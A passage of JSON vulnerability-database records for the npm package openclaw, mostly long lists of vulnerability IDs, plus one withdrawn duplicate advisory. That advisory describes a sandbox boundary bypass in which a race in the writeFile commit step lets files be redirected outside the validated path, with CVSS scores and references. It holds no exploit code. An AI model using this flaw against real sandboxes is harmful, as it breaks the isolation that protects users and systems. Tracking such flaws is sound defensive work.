469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-wmgj-hrx3-23gj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z8sm-pm9t-wyhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90857?format=json","vulnerability_id":"VCID-z9a2-t66z-buga","summary":"Duplicate Advisory: OpenClaw: Sandbox `writeFile` commit could race outside the validated path\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-xvx8-77m6-gwg6. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.11 contains a sandbox boundary bypass vulnerability in the fs-bridge writeFile commit step that uses an unanchored container path during the final move operation. An attacker can exploit a time-of-check-time-of-use race condition by modifying parent paths inside the sandbox to redirect committed files outside the validated writable path within the container mount namespace.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xvx8-77m6-gwg6","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xvx8-77m6-gwg6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32977","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32977"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-boundary-bypass-via-unanchored-writefile-commit-path","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-boundary-bypass-via-unanchored-writefile-commit-path"},{"reference_url":"https://github.com/advisories/GHSA-xxj4-96ph-g6j6","reference_id":"GHSA-xxj4-96ph-g6j6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xxj4-96ph-g6j6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-